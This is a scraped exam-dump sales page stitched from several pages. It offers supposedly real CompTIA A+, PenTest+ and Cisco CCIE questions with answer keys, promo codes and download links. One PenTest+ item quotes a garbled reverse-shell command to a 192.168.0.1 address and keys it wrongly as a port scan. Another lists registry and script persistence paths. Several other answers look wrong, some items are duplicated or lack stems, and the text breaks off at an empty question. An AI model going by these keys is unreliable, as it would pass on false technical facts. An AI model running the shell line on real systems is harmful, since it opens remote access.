Windows workstations to use the new proxy server. Which of the following Control Panel utilities should the technician
use to configure the setting?
A. Internet Options ?Advanced
B. Internet Options ?Connections
C. Internet Options ?Security
D. Internet Options ?Content
E. Internet Options ?Privacy
Correct Answer: B

 

QUESTION 12
A user contacts a technician to troubleshoot server errors. The user explains that some files will not open on the server,
the data backups are operational, and the weather has been bad. The technician notices missing time slots in the event
log.
Which of the following should the technician replace to prevent these issues in the future?
A. System memory
B. Surge protector
C. Hard drives
D. Battery backup
Correct Answer: D

 

QUESTION 13
A user\\’s smartphone is making the camera shutter noise even when the user is not taking pictures. When the user
opens the photo album, there are no new pictures. Which of the following steps should be taken FIRST to determine the
cause of the issue?
A. Uninstall the camera application
B. Check the application permissions
C. Reset the phone to factory settings
D. Update all of the applications on the phone
E. Run any pending OS updates
Correct Answer: B

Follow Pass4itsure free sharing of YouTube channels

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ/videos get more useful exam content.

Latest CompTIA 220-1002 YouTube videos:

The latest CompTIA Other Certification 220-1002 dumps help you get on the ladder of success! Get the latest updates from the 220-1002 exam: https://www.pass4itsure.com/220-1002.html (Q&As: 152) For more effective exam dumps. follow me!

Pass4itsure Promo Code 15% Off

pass4itsure 220-1002 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the CompTIA 220-1002 exam.
Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest
real questions and answers with the lowest prices, help you pass the 220-1002 exam easily at first try.

why pass4itsure 220-1005 dumps

Maybe you might like the exam questions and answers

Latest CompTIA IT Fundamentals PT0-001 exam dumps, PT0-001 exam Practice | 100% Free

We share the latest effective CompTIA IT Fundamentals PT0-001 exam dumps online Practice test to improve your skills! You can also choose PT0-001 PDF or PT0-001 YouTube to learn! Get the full PT0-001 dumpshttps://www.pass4itsure.com/pt0-001.html (Q&As: 131 ) to pass the exam easily!

[PDF] Free CompTIA PT0-001 pdf dumps download from Google Drive: https://drive.google.com/open?id=1ftPurlAplBqmP4maGXM7038-ht0bDQOE

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1QYm4eH6gp3sWG4yKbFHh0mGtpGdzOlcV

CompTIA PenTest+ PT0-001 Study Guide – CompTIA IT Certifications: https://certification.comptia.org/training/self-study/books/pentest-pt0-001-study-guide

CompTIA PenTest+ is a certification for intermediate skills level cybersecurity professionals who are tasked with hands-on penetration
testing to identify, exploit, report, and manage vulnerabilities on a network.

CompTIA PenTest+ is the only penetration testing exam taken at a Pearson VUE testing center with both hands-on, performance-based questions and multiple-choice, to ensure each candidate possesses the skills, knowledge, and ability to perform tasks on systems. PenTest+ exam also includes management skills used to plan, scope, and manage weaknesses, not just exploit them. PenTest+ is unique because our certification requires a candidate to demonstrate the hands-on ability and knowledge to test devices in new environments such as the cloud and mobile, in addition to traditional desktops and servers.

CompTIA Certifications: https://certification.comptia.org/certifications

Complete list of CompTIA exams: https://www.pass4itsure.com/comptia.html

Latest effective CompTIA PT0-001 Exam Practice Tests

QUESTION 1
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on
the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST
likely causes for this difference? (Select TWO) 
A. Storage access 
B. Limited network access 
C. Misconfigured DHCP server 
D. Incorrect credentials 
E. Network access controls 
Correct Answer: AB

QUESTION 2
Click the Exhibit button.

pass4itsure PT0-001 exam question q2A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that
is causing trouble on the network Which of the following types of attacks should the tester stop? 
A. SNMP brute forcing 
B. ARP spoofing 
C. DNS cache poisoning 
D. SMTP relay 
Correct Answer: B

QUESTION 3
A security analyst was provided with a detailed penetration report, which was performed against the organization\\’s
DMZ environment. It was noted in the report that a finding has a CVSS base score of 10.0. Which of the following
levels of difficulty would be required to exploit this vulnerability? 
A. Very difficult; perimeter systems are usually behind a firewall. 
B. Somewhat difficult; would require significant processing power to exploit. 
C. Trivial; little effort is required to exploit this finding. 
D. Impossible; external hosts are hardened to protect against attacks. 
Correct Answer: C 
Reference https://nvd.nist.gov/vuln-metrics/cvss

QUESTION 4
A penetration tester is checking a script to determine why some basic persisting. The expected result was the program
outputting “True.”

pass4itsure PT0-001 exam question q4

Given the output from the console above, which of the following explains how to correct the errors in the script? (Select
TWO) 
A. Change fi\\’ to \\’Endlf 
B. Remove the \\’let\\’ in front of \\’dest=5+5\\’. 
C. Change the \\’=” to \\’-eq\\’. 
D. Change -Source* and \\’dest\\’ to “Source” and “Saddest” 
E. Change \\’else\\’ to \\’elif. 
Correct Answer: BC

QUESTION 5
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities,
with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under
such circumstances, which of the following would be the BEST suggestion for the client? 
A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation. 
B. Identify the issues that can be remediated most quickly and address them first. 
C. Implement the least impactful of the critical vulnerabilities\\’ remediations first, and then address other critical
vulnerabilities 
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. 
Correct Answer: D

QUESTION 6
A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port The penetration tester wishes to forward that traffic back to a device Which of the following are the BEST tools to use a few this purpose?
(Select TWO) 
A. Tcpdump 
B. Nmap 
C. Wiresrtark 
D. SSH 
E. Netcat 
F. Cain and Abel 
Correct Answer: DE

QUESTION 7
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the
penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST
meet this goal? 
A. Perform an HTTP downgrade attack. 
B. Harvest the user credentials to decrypt traffic. 
C. Perform a MITM attack. 
D. Implement a CA attack by impersonating trusted CAs. 
Correct Answer: A

QUESTION 8
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in
electrical utility facilities, natural gas facilities, dams, and nuclear facilities? 
A. ICS vendors are slow to implement adequate security controls. 
B. ICS staff are not adequately trained to perform basic duties. 
C. There is a scarcity of replacement equipment for critical devices. 
D. There is a lack of compliance for ICS facilities. 
Correct Answer: B

QUESTION 9
The following line was found in an exploited machine\\’s history file. An attacker ran the following command: 
bash -i >and /dev/tcp/192.168.0.1/80 0> and1 
Which of the following describes what the command does? 
A. Performs a port scan. 
B. Grabs the web server\\’s banner. 
C. Redirects a TTY to a remote system. 
D. Removes error logs for the supplied IP. 
Correct Answer: A

QUESTION 10
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO). 
A. Shodan 
B. SET 
C. BeEF 
D. Wireshark 
E. Maltego 
F. Dynamo 
Correct Answer: AE 
References: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint- tools/#gref

QUESTION 11
A penetration tester has gained access to a marketing employee\\’s device. The penetration tester wants to ensure that
if the access is discovered, control of the device can be regained. Which of the following actions should the penetration
tester use to maintain persistence to the device? (Select TWO.) 
A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. 
B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com. 
C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1. 
D. Create a fake service in Windows called RTAudio to execute manually. 
E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio. 
F. Create a scheduled task to call C:\windows\system32\drivers\etc\hosts. 
Correct Answer: AC

QUESTION 12
Which of the following tools is used to perform a credential brute force attack? 
A. Hydra 
B. John the Ripper 
C. Hashcat 
D. Peach 
Correct Answer: A 
Reference https://www.greycampus.com/blog/information-security/brute-force-attacks- prominent-tools-totackle-such-attacks

QUESTION 13
A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for
this engagement? 
A. Nikto 
B. WAR 
C. W3AF 
D. Swagger 
Correct Answer: D

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ/videos get more useful exam content.

Latest CompTIA PT0-001 YouTube videos:

About the exam

CompTIA PenTest+ assesses the most up-to-date penetration testing, and vulnerability assessment and management skills necessary to determine the resiliency of the network against attacks. Successful candidates will have the intermediate skills required to customize assessment frameworks to effectively collaborate on and report findings. Candidates will also have the best practices to communicate recommended strategies to improve the overall state of IT security.

Share 13 of the latest CompTIA PT0-001 dumps Practice tests for free to help you improve your skills. PT0-001 PDF download Online! Get the full PT0-001 dumpshttps://www.pass4itsure.com/pt0-001.html (Q&As: 131 ). Easily pass the exam!

[PDF] Free CompTIA PT0-001 pdf dumps download from Google Drive: https://drive.google.com/open?id=1ftPurlAplBqmP4maGXM7038-ht0bDQOE

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1QYm4eH6gp3sWG4yKbFHh0mGtpGdzOlcV

Pass4itsure Promo Code 15% Off

pass4itsure PT0-001 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the CompTIA PT0-001 exam. Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest real questions and answers with the lowest prices, help you pass the PT0-001 exam easily at first try.

pass4itsure PT0-001 dumps

related more: [New Version] Download Latest Cisco 700-070 Dumps PDF Cisco TelePresence Solutions Specialist Exam Video Trianing Download Online 50Q Full Version Offer 1-35

Latest CompTIA Other Certification 220-1001 exam dumps, 220-1001 exam Practice | 100% Free

We share the latest effective CompTIA Other Certification 220-1001 exam dumps online Practice test to improve your skills! You can also choose 220-1001 PDF or 220-1001 YouTube to learn! Get the full 220-1001 dumpshttps://www.pass4itsure.com/220-1001.html (Q&As: 78 ) to pass the exam easily!

[PDF] Free CompTIA 220-1001 pdf dumps download from Google Drive: https://drive.google.com/open?id=1HLFaAhFDIY_ddEW7PnhnEQ3kq2UXJUt3

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1QYm4eH6gp3sWG4yKbFHh0mGtpGdzOlcV

CompTIA A+ 220-1001 & 220-1001 Study Guide: https://certification.comptia.org/training/self-study/books/a-220-1001-220-1001-study-guide

The Official CompTIA A+ Core 1 Study Guide (220-1001) has been developed by CompTIA for the CompTIA certification candidate.Rigorously evaluated by third-party subject matter experts to validate adequate coverage of the Core 1 exam objectives, the Official CompTIA A+ Core 1 Study Guide teaches the essential skills and information required for the CompTIA certification exam (220-1001).

After reading the A+ 220-1001 study guide you will understand how to:

  • Install and configure PC system unit components and peripheral devices.
  • Install, configure, and troubleshoot display and multimedia devices.
  • Install, configure, and troubleshoot storage devices.
  • Install, configure, and troubleshoot internal system components.
  • Explain network infrastructure concepts.
  • Configure and troubleshoot network connections.
  • Implement client virtualization.
  • Support and troubleshoot laptops.
  • Support and troubleshoot mobile devices.
  • Support and troubleshoot print devices.

CompTIA Certifications: https://certification.comptia.org/certifications

Complete list of CompTIA exams: https://www.pass4itsure.com/comptia.html

Latest effective CompTIA 220-1001 Exam Practice Tests

QUESTION 1
A user wants to print a large job on both the front and back sides of the paper. 
Which of the following settings should the technician advise the user to change in the printer settings? 
A. Collate 
B. Orientation 
C. Duplex 
D. Transparency 
Correct Answer: C


QUESTION 2
A printer stops working in the billing department and cannot be repaired. A new printer has been ordered and a
technician is tasked with allowing other users to print to the billing manager\\’s printer until the new printer arrives. The
manager\\’s printer is currently used via USB connection, and there are no network jacks available for use. 
Which of the following is the BEST way for the technician to allow access to the printer? 
A. Create a share on the manager\\’s computer and give the users rights to the share. 
B. Install the printer on the users\\’ desktops and point it to the IP address of the manager\\’s computer. 
C. Purchase a wireless printer so the users can access the printer via network. 
D. Provide flash drives to the users so they can transfer data to the manager\\’s computer for printing. 
Correct Answer: C


QUESTION 3
During an inspection, it was found that data racks were not properly grounded. To pass the inspection and address a
growing concern to protect data cabling and equipment, a technician must make sure all racks are properly grounded. 
Which of the following tools should the technician use to verify this has been completed? 
A. Multimeter 
B. Cable tester 
C. Tone generator 
D. Voltmeter 
Correct Answer: A


QUESTION 4
A customer wants to purchase a new home computer. The machine will mainly be used for internal browsing and
streaming video, except on weekends when the customers\\’ son will use it to play games with friends. 
Which of the following should the technician focus on to meet these requirements? 
A. 80mm case fans 
B. Four-core processor 
C. RAID 5 array 
D. 16GB DDR2 memory 
E. Dual monitors 
F. Encrypted hard drive 
Correct Answer: B


QUESTION 5
A server needs a RAM upgrade, and a technician has been tasked with retrieving the RAM from storage and then
installing it. 
Whish of the following is the BEST RAM type for the technician to retrieve? 
A. SoDIMM 
B. DDR4 
C. Single channel 
D. ECC 
Correct Answer: B


QUESTION 6
Which of the following cable types should be used to connect a cable modem to a SOHO router? 
A. Thunderbolt 
B. Coaxial 
C. USB 
D. Ethernet 
Correct Answer: D


QUESTION 7
A technician needs to routinely run scripting commands in Linux but does not want to walk over the server room every
time to perform the task. The technician also travels between buildings and has a Windows 10 laptop with 4GB of
memory and a fully partitioned 500GB hard drive. 
Which of the following steps should the technician take to resolve this issue? (Choose two.) 
A. Increase the memory to 8GB. 
B. Install a Linux guest VM. 
C. Add another 500GB hard drive. 
D. Create a Linux LiveBoot CD. 
E. Repartition the hard drive. 
F. Install Linux on a new ext3 partition. 
Correct Answer: EF


QUESTION 8
An end user wants to have a second monitor installed on a laptop. Which of the following would allow a technician to
configure the laptop to show both screens once the cable is connected? 
A. Plug an external monitor into the USB port. 
B. Use the Fn and function key combination 
C. Adjust the monitor display settings. 
D. Enable DisplayPort. 
Correct Answer: C


QUESTION 9
A business owner wants to provide security to laptop users with the ability to charge their devices, access corporate
LAN resources, and allow for a variety of their removable hardware. 
Which of the following devices would BEST meet the owner\\’s needs? 
A. Docking station 
B. Port replicator 
C. Thunderbolt 
D. USB hub 
Correct Answer: A


QUESTION 10
A user reports that printing on heavy cardstock paper results in the image smearing if touched. When printing on plain
paper, the problem does not occur. 
Which of the following would be the NEXT troubleshooting step to perform? 
A. Increase the fuser temperature. 
B. Change the paper feed rate. 
C. Clean the transfer roller. 
D. Replace the toner cartridge. 
Correct Answer: A


QUESTION 11
A technician upgraded the memory on a server from two 8GB sticks to eight 32GB. The server memory is now at full
capacity per the user guide. When the technician powers on the system, only 128 GB of memory is recognized by the
OS and the BIOS. The technician decides to upgrade to the latest version of the firmware on the system, which does not
help. Next, the technician installs the memory in sets of 64GB at a time. Each individual set of 64GB is fully recognized
by the server. 
Which of the following will not allow the server to recognize all of the memory installed at the same time? 
A. The power supply is not supplying enough power for the memory. 
B. The memory has too many ECC errors and is shutting down 
C. The server is overheating when all of the memory is installed. 
D. The server needs DDR4 memory, and DDR3 is installed. 
Correct Answer: D


QUESTION 12
A user logs on a PC and receives a message stating there is a duplicate IP address on the network. After a system
restart, the user notices the same error. 
Which of the following is the MOST probable cause of the error? 
A. The user is still logged into another device. 
B. The user has set a static IP address. 
C. The user has moved to a different office. 
D. The user has wireless and wired connections. 
Correct Answer: B


QUESTION 13
Which of the following is MOST likely causing the problem? 
A. Airplane mode 
B. Tethering 
C. Disabled hotspot 
D. VPN 
Correct Answer: A

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ/videos get more useful exam content.

Latest CompTIA 220-1001 YouTube videos:

Share 13 of the latest CompTIA 220-1001 dumps Practice tests for free to help you improve your skills. 220-1001 PDF download Online! Get the full 220-1001 dumpshttps://www.pass4itsure.com/220-1001.html (Q&As: 78 ). Easily pass the exam!

[PDF] Free CompTIA 220-1001 pdf dumps download from Google Drive: https://drive.google.com/open?id=1HLFaAhFDIY_ddEW7PnhnEQ3kq2UXJUt3

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1QYm4eH6gp3sWG4yKbFHh0mGtpGdzOlcV

Pass4itsure Promo Code 15% Off

pass4itsure 220-1001 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the CompTIA 220-1001 exam. Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest real questions and answers with the lowest prices, help you pass the 220-1001 exam easily at first try.

pass4itsure 220-1001 dumps

related more: Latest Real free juniper JNCIP jn0-643 exam dumps (44Q&A) | BSABIO

50 latest Cisco CCIE Service Provider 400-201 dumps Practice test questions, 400-201 pdf free Download

The best Test dump select Pass4itsure. We succeeded in helping a lot of people pass the exam. Bsabio collects 50 free and effective Cisco CCIE Service Provider 400-201 exam Dumps “Cisco CCIE® Service Provider Written Exam (400-201)”, 400-201 pdf online download and 400-201 YouTube online learning to help you improve your success rate if you are a Cisco enthusiast please follow us and we update throughout the year. If you want to get a Cisco CCIE Service Provider 400-201 exam Certificate: https://www.pass4itsure.com/400-201.html (Q&As:711 PDF + VCE),Guaranteed to pass the exam at once times

[PDF] Free Cisco CCIE Service Provider 400-201 dumps download from Google Drive: https://drive.google.com/open?id=1Iw6mVrvsYHCf3aOu9MjxosWzr45ntXOJ

[PDF] Free Full Cisco dumps download from Google Drive: https://drive.google.com/drive/folders/1dq6fv9FX6zSDDoHc3ge-WzVU9SNaUbsH

400-201 CCIE Service Provider – Cisco: https://www.cisco.com/c/en/us/training-events/training-certifications/exams/current-list/ccie-sp.html

Share 50 of the latest Cisco CCIE Service Provider 400-201 Exam Practice questions and answers for free

QUESTION 1
Which option is the Cisco cloud management platform that is designed for enterprise and public sector IT organizations to help build private and hybrid clouds?
A. Cisco Cloud Orchestrator
B. Cisco UCS Director
C. Cisco Intercloud Fabric
D. Cisco Intelligent Automation for Cloud
Correct Answer: D

 

QUESTION 2

pass4itsure 400-201 exam question

Refer to the exhibit. An MPLS VPN service was provisioned for customer ABC both sites must be communication to each other primarily over the wan link with no traffic over the wan circuits PE1 has the same configuration as PE2 which two
commands can be configure on the PEs to accomplish the desired goal?(Choose two)
A. Under sub interface IP VRF SITEMAP SoO with the same SoO value.
B. no neighbor <CE-IP address> AS-override.
C. Neighbor<CE-IP address> route-map SoO in with the same SoO value.
D. Neighbor<CE-IP address> route-map SoO in with a different SoO value.
E. Neighbor<CE-IP address> route-map SoOout with the same SoO value.
Correct Answer: BC

 

QUESTION 3

pass4itsure 400-201 exam question

Refer to the exhibit Customer ABC is peering with two service providers for internet access. In order to prevent the AS 100 from becoming a transit AS between ISP_1 and ISP_2. Which BGP configuration must be applied to achieve this
goal?
A. CE1# CE2#
ip as-path access-list 1 permit^100$ ip as-path access-list 1 permit^100$ route-map LOCAL_ONLY permit 10 route-map LOCAL_ONLY permit 10 match as-path 1 match as-path 1 router bgp 100 router bgp 100
neighbor 1.1.2.2 route-map LOCAL_ONLY in neighbor 1.1.1.2 route-map LOCAL_ONLY in
B. CE1# CE2#
ip as-path access-list 1 permit^$ ip as-path access-list 1 permit^$ route-map LOCAL_ONLY permit 10 route-map LOCAL_ONLY permit 10 match as-path 1 match as-path 1 router bgp 100 router bgp 100
neighbor 1.1.2.2 route-map LOCAL_ONLY out neighbor 1.1.2.2 route-map LOCAL_ONLY out
C. CE1# CE2#
ip as-path access-list 1 permit^$ ip as-path access-list 1 permit^$ route-map LOCAL_ONLY permit 10 route-map LOCAL_ONLY permit 10 match as-path 1 match as-path 1 router bgp 100 router bgp 100
neighbor 1.1.2.2 route-map LOCAL_ONLY out neighbor 1.1.2.2 route-map LOCAL_ONLY out
D. CE1# CE2#
ip as-path access-list 1 permit^11$ ip as-path access-list 1 permit^11$ route-map LOCAL_ONLY permit 10 route-map LOCAL_ONLY permit 10
match as-path 1 match as-path 1
router bgp 100 router bgp 100
neighbor 1.1.2.2 route-map LOCAL_ONLY out neighbor 1.1.2.2 route-map LOCAL_ONLY out
E. CE1# CE2#
ip as-path access-list 1 permit^$ ip as-path access-list 1 permit^$ route-map LOCAL_ONLY permit 10 route-map LOCAL_ONLY permit 10 match as-path 1 match as-path 1 router bgp 100 router bgp 100
neighbor 1.1.2.2 route-map LOCAL_ONLY in neighbor 1.1.1.2 route-map LOCAL_ONLY in
Correct Answer: C

 

QUESTION 4
A network operation engineer has these requirement:
*prevent multicast transit when it is enforced by unicast stub routing.
*Reduce the overall processing of PIM control traffic. Especially when the number of stub links increases on the stub device.
*protect against multicast spoofing of PM designated router messages and PIM assert messages.
Which solution meets these requirements?
A. explicit tracking of receivers.
B. multicast stub routing.
C. Source Specific Multicast.
D. PIM allow RP.
Correct Answer: B

 

QUESTION 5
Which option is the benefit of per-link LFA over per-prefix LFA?
A. It has a greater applicability
B. It provides greater protection coverage
C. It is simpler
D. It enables better bandwidth utilization
Correct Answer: C

 

QUESTION 6
Which standard provides insurance that the new hardware rollout plan meets certain environment design guidelines before deployment?
A. NAS
B. eTOM
C. NEBS
D. ITIL
E. COBIT
Correct Answer: C

 

QUESTION 7
ISP A provides L2VPN services to Company B through an MPLS network. Company B uses all available CoS values to classify and different traffic forwarding within all Company B sites. ISP A uses the following CoS values to differentiate
service classes for the VPN customer traffic
*MPLS EXP 0 for Bronze service class*MPLS EXP 1 for Silver service class
*MPLS EXP 2 for Gold service class
*Remaining MPLS EXP values for ISP A internal use
ISP A’s policy is to forward VPN customer traffic based only on their Bronze, silver and Gold service classes. Which QoS method must ISP A implement to achieve this?
A. Short-pipe Mode
B. Russian Doll Model
C. Pipe Mode
D. Uniform Mode
E. Maximum Allocation Model
Correct Answer: D

 

QUESTION 8
Which two options are characteristics of MoFRR? ( Choose two)
A. Uses additional PIM join toward source
B. Based on multicast forward error correction feature
C. Based on PIM Fast Route
D. Requires MPLS TE FRR enabled with link protection and node protection
E. Utilizes two equal-cost paths toward source
Correct Answer: AE

 

QUESTION 9
Which routing table is used by PEs and ASBRs to store all VPN routes that need to be exchanged in an Inter-AS L3VPN option B scenario?
A. IGP table
B. VRF routing table
C. Global routing table
D. BGP table
Correct Answer: D

 

QUESTION 10
In the MC-LAG environment, which two statements about clustering HA are true?
A. Public connection is used to access the active node of cluster from the outside cluster
B. Private connection is used to connect the nodes of the cluster for private communication
C. Private connection is used to access the active node of cluster from the outside cluster
D. Public connection is used to connect the nodes of cluster for private communication
E. Public connection is used to monitor the health and status of each node in the HA cluster using the heartbeat system
Correct Answer: AB

 

QUESTION 11

pass4itsure 400-201 exam question

Refer to the exhibit. After the BGP TCP negotiation between Router A and Router B, what will be the value of the keep alive timer and the hold-down timer, respectively?
A. 3 seconds and 9 seconds
B. 60 seconds and 180 seconds
C. 10 seconds and 9 seconds
D. no value, because BGP negotiation will not be successful
E. 10 seconds and 10 seconds
F. 10 seconds and 30 seconds
G. 3 seconds and 30 seconds
H. 3 seconds and 10 seconds
Correct Answer: D

 

QUESTION 12
Which are two benefits of using segment routing over RSVP-TE for traffic engineering? (Choose two)
A. Segment routing traffic engineering tunnels always follow the low-latency path
B. ECMP-aware traffic engineering is natively supported by segment routing
C. Per-flow state is present only at the ingress node to the Segment routing-enabled network
D. Per-flow state is present at the ingress and egress node to the segment routing-enabled network
E. Per-flow state is maintained on all nodes of the segment routing-enabled network
Correct Answer: BC

 

QUESTION 13
Which three PIM modes require RP? (Choose three)
A. PIM-DM
B. PIM-SM
C. PIM with mLDP
D. PIM-SSM
E. PIM anycast
F. PIM-BIDIR
Correct Answer: BEF

 

QUESTION 14
Which option is the benefit of per-link LFA over per-prefix LFA?
A. It has a greater applicability
B. It provides greater protection coverage
C. It is simpler
D. It enables better bandwidth utilization
Correct Answer: C

 

QUESTION 15
In which two ways does the BGP graceful restart capability preserve prefix information during a restart? (Choose two.)
A. The peer router sends an end -of RIB message to the restarting router
B. The peer router immediately removes the BGP routes that it learned from the restarting router from its BGP routing table
C. The restarting router waits to receive updates from the neighboring routers.
D. The restarting router does not remove any stale prefixes after the timer for stale entries exTs.
E. The restarting router removes any stale prefixes after the timer for stale entries expires
Correct Answer: CE

 

QUESTION 16
What is the port number of an IPsec Encapsulating Security Payload packet? (ESP)
A. IP protocol 51B. UDP port 50
C. Ip protocol 50
D. TCP Port 50
E. UDP port 51
F. TCP port 51
Correct Answer: C

 

QUESTION 17
Two routers that are running MPLS and LDP have multiple links that than connect them to each other. An engineer wants to ensure that the label bindings are not flushed from the LIB if one of the links fails. Which configuration meets this
requirement?
A. the mpls ldp neighbor targeted command
B. the mpls ip command on a Cisco MPLS TE tunnel
C. the mpls ldp autoconfig command
D. the mpls ldp session protection command
Correct Answer: D

 

QUESTION 18
A network engineer has a requirement to configure IP flow exporting using standard protocols on a cisco IOS XE device. Which configuration achieves this goal?
A. flow exporter EXPORTER
destination 10.1.1.1
export-protocol version 9
transport udp 90
B. flow exporter EXPORTER
destination 10.1.1.1
source Loopback 0
transport udp 90
C. flow exporter EXPORTER
destination 10.1.1.1
source Loopback 0
transport udp 90
version ipfix
D. flow exporter EXPORTER
destination 10.1.1.1
export-protocol ipfix
transport udp 90
Correct Answer: D

 

QUESTION 19
A customer has a requirements record voice calls for IPT connected on switch A using VLAN 200.Record traffic should be forwarded to the IPCC recording server, which is connected on switch B, voice recording is not working. Assuming that
RSPAN source monitoring is properly set, which action fixes this problem?
A. On switch B, the monitor session 1 destination remote <interface_config_to_recording_server> command must be applied
B. On switch B, the port connects to the recording server must have an IP address and be accessible via VLAN 200
C. On switch B, the port that connects to the reording server must be accessed on VLAN
D. On switch A and switch B, the remote-span command must be configured on the mirroring dedicated VLAN
Correct Answer: D

 

QUESTION 20
A service provider engineering team must design a solution that supports end-to-end LSPS for multiple IGP domains within different AS numbers. According to RFC 3107, which solution achieves this goal?
A. LDP and BGP
B. BGP and Send-label
C. RSVP and IS-IS or OSPF
D. RSVP and BGP
E. mLDP
Correct Answer: B

 

QUESTION 21
A service provider is implementing an nV Edge system with the two ASR 9000 chassis has two RSPs. Which two cabling methods reflect the minimum configuration needed for full synchronization between the two Cisco ASR 9000 chassis?
(Choose two)
A. Create the single virtual control plane that connect the two RSPs between the two chassis via Layer 2 connections
B. Create the IRL connections between the two chassis via Layer 3 connections using the EOBC 10 Gbps ports of the RSPs
C. Create the IRL connections between the two chassis via Layer 3 connections using the ports of the line cards
D. Create the single virtual control plane that connect the two chassis via Layer 3 connections using the 10 Gbps ports of the line cards
E. Create the IRL connections between the two chassis via Layer 1 connections using the10 Gbps ports of the line cards
F. Create the single virtual control plane that connect the two chassis via 100 Gbps bundle interfaces
G. Create the IRL connections between the two chassis via Layer 1 connections using the EOBC 10 Gbps ports of the RSPs
Correct Answer: AE

 

QUESTION 22
A service provider offers four classes of service for MPLS VPN customer with the following IPP/EXP values
A. voice=5
ii. video=4
iii. priority-data =3
iv. best-effort data=0
The service provider also supports multicast VPN services in the priority data and best- effort classes.
Multicast VPN is implemented as a draft-rosen profile. On a P router, in the MPLS core, the ingress.
QoS policy-map must classify all incoming packets, so that different classes of traffic can be properly handled in fabric queues and egress queues. All types of packets in the core network must be covered’ Which ingress classification
offers the optimal performance and provides the minimum number of actions that match the service provider QoS requirements?
B. class-map match-any VOICE
match mpls experiment topmost 5
class-map match-any VIDEO
match mpls experiment topmost 4
class-map match-any CONTROL
match mpls experiment topmost 6
class-map match-any PRIORITY
match mpls experimental topmost 3
!
policy-map INGRESS
class VOICE
set qos-group 5
class VIDEO
set qos-group 4
class CONTROL
set qos-group 6
class PRIORITY
set qos-group 3
class class-default
C. class-map match-any VOICE
match mpls experiment topmost 5
class-map match-any VIDEO
match mpls experiment topmost 4
class-map match-any CONTROL
match mpls experiment topmost 6 7
match ip precedence ipv4 internet network
class-map match-any PRIORITY
match mpls experimental topmost 3
match ip precedence ipv4 flash
!
policy-map INGRESS
class VOICE
set qos-group 5
class VIDEO
set qos-group 4
class CONTROL
set qos-group 6
class PRIORITY
set qos-group 3
class class-default
D. class-map match-any VOICEmatch mpls experiment topmost 5
match ip precedence ipv4 critical
class-map match-any VIDEO
match mpls experiment topmost 4
match ip precedence ipv4 flash-override
class-map match-any PRIORITY
match mpls experimental topmost 3
match ip precedence ipv4 flash
!
policy-map INGRESS
class VOICE
set qos-group 5
class VIDEO
set qos-group 4
class PRIORITY
set qos-group 3
class class-default
Correct Answer: C

 

QUESTION 23
An engineer deploys a new Cisco IOS XR router and connects a Gigbit Ethernet port to an existing Cisco Catalyst 3650 Series Switch. The engineer uses known good optics and fiber, but the link has not come up and it is stuck in the down/
down state.
What is the root cause of this issue?
A. Cisco IOS XR devices must use copper connections to Catalyst 3650 Series Switches
B. UDLD must be enabled on the Catalyst 3650 Series switch
C. CDP is not enabled on the Cisco IOS XR device
D. Auto negation must be disabled on the Catalyst 3650 Series Switch
Correct Answer: D

 

QUESTION 24
In a multihop BFD scenario, which two options create a multihop template and associate it with maps of destinations and associated timers? (Choose two)
A. Fallover BFD
B. BFD echo
C. BFD map
D. BFD template
E. BFD version 2
Correct Answer: CD

 

QUESTION 25

pass4itsure 400-201 exam question

Refer to the exhibit PIM sparse mode is implemented in the network RPF succeeds under which condition?
A. The RPF check succeeds for the highest DR priority for the PIM router
B. The RPF check succeeds for both PIM neighbors, and traffic load-balances across both neighbors
C. The RPF check succeeds for the next hop whose router ID is the highest
D. The RPF check succeeds for the highest interface IP address for the PIM router
Correct Answer: D

 

QUESTION 26
An engineer is connecting a new 10-Gbps Ethernet link. Which type of transceiver must the Engineer purchase that is the current industry standard?
A. GBIC
B. XFP
C. X2
D. SFP
Correct Answer: B

 

QUESTION 27

pass4itsure 400-201 exam question

Refer to the exhibit what is the status of the L2 tunnel between PE1,PE2 and the layer 2 switches ?
A. The layer 2 tunnel is down due to the ACL is applied on the PE2 interface
B. The layer 2 tunnel is up and SW1 become the root bridge for VLAN 10
C. The layer 2 tunnel is down due to the MTU mismatch between SW1 and SW2
D. The layer 2 tunnel is up but no BPDUs are exchange unless an extra configuration is applied
Correct Answer: B

 

QUESTION 28
